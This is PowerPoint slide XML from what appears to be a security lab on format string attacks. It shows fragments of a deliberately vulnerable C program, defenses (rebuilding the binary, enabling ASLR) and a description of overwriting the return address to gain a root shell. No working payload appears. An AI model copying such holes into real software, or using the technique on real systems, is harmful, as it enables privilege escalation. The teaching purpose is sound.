              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> &lt;2) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "Failed: Usage [% s password] \ n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> [0]); return 1; } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff)); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "pass @% # 8x, [% d] [% # 8x] \ n", &amp; pass, pass, pass); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>.......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>........</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238895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3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761580" y="923407"/>
            <a:ext cx="5328592" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Rebuild </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">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formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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dirty="0" err="1">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formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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ko-KR" kern="100"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0" name="직선 연결선 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFBB367-8F9C-4CF3-8EF2-2D66C2B98ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="813116"/>
            <a:ext cx="0" cy="4272068"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10B3061-1583-4B7F-B6E7-9FB5FAC6F606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5407212"/>
            <a:ext cx="9144000" cy="1406163"/>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The defense methods against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> attack are here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>You can use any method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>One is rebuilding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> and the other is ASLR enabling.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775756" y="3501008"/>
            <a:ext cx="5328592" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enable ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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dirty="0" err="1">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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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 -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">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kernel.randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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 = 2 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR"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756" y="4210626"/>
            <a:ext cx="4799532" cy="442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7298" y="1700808"/>
            <a:ext cx="40005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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="2579818"/>
            <a:ext cx="648072" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100"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2514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923407"/>
            <a:ext cx="5472608" cy="729430"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check out the attack does not happen with the same account ‘test’</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379774" y="5373216"/>
            <a:ext cx="5328592" cy="898082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="2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dirty="0"/>
              <a:t>Check out the attack does not happen with the same account ‘test’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>This is the attack fail scene when we defense using format string rebuild.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>and this is the attack fail scene when we defense using ASLR enabling.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="shape1414"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="2403464"/>
            <a:ext cx="5472608" cy="960310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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60" y="4343916"/>
            <a:ext cx="118491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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="2020198"/>
            <a:ext cx="5634132" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Due to Rebuilding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the attack failed</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100"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0" name="직사각형 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379774" y="3974584"/>
            <a:ext cx="5634132" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Due to ASLR enabling, the attack also failed</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100"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111109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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18"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229" y="1916563"/>
            <a:ext cx="5434071" cy="1517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7" name="직사각형 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444646" y="961670"/>
            <a:ext cx="5328592" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Defense]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="직선 연결선 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5714AA-2D05-47A8-9C7F-E93F0A18D5D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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9A9FD0-8831-4845-85E0-E484FD6A3D9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960096" y="5373216"/>
            <a:ext cx="4895528"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Finally, you check your lab.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19639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35C70FC-6EC3-4A37-9667-0D865E257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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A9C909-4D8D-4E1D-8C40-A6DA8A3E962A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338421" y="2852936"/>
            <a:ext cx="1515158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Thank you !!</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88F17B77-DE52-4FA2-B50D-EE00808AA86D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623392" y="1268760"/>
            <a:ext cx="11305256" cy="2185214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
              <a:t>C. Attack Type (Characteristics) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>This attack exploits a vulnerability in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>() function that uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (typically the format used to accept input from the user or output results) to obtain the root shell by writing the address of the shellcode to the location of the RET. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> This lab aims to change the value of the variable pass to 144 as a practice to see if the variable value defined in the program can be changed to a desired value when a vulnerable function is used</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="부제목 2">
            <a:extLst>
